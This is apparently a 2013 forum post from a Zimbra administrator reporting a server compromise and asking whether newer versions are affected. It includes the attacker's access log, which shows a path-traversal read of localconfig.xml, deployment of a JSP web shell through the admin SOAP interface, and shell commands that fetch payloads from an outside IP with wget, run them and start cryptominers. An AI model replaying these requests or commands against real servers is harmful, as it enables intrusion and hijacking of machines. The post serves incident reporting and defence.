Yesterday I noticed hack of my zimbra server.
I attached access log of zimbra server.
It looks that hacker uses some vulnerability of zimbra scripts to upload files to /var/tmp/ and execute them as "zimbra" user. In my case some cpumining scripts.
I have 7.2.2_GA_2852 zimbra version. Zimbra 8.0.4.GA.5737 seems unaffected (yet).
I know, that I should upgrade, so concider this as question - are newer versons susceptible to this attack or are "safe"? Which version I shoud install? Is comunity aware of this security problem? Is there any quick fix to this (except blocking 7071 port of zimbra from Internet).
__MYIP__ is replaced instead of IP of my server.

Thank you very much for reaction.
Jan Pekar @ Imatic

179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 976 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "POST /service/admin/soap HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:06 +0000] "POST /service/admin/soap HTTP/1.1" 200 9624 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:08 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:10 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 247 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:12 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
179.43.141.149 - - [31/Dec/2013:14:24:14 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:16 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 253 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:19 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:20 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:22 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb HTTP/1.1" 200 228 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2F CFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=killall+-9+a+b+minerd+minerd32+minerd64+perl HTTP/1.1" 500 7009 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:43 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=perl+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 217 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:33 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar% 2Ftmp%2Fb" "WWW-Mechanize/1.73"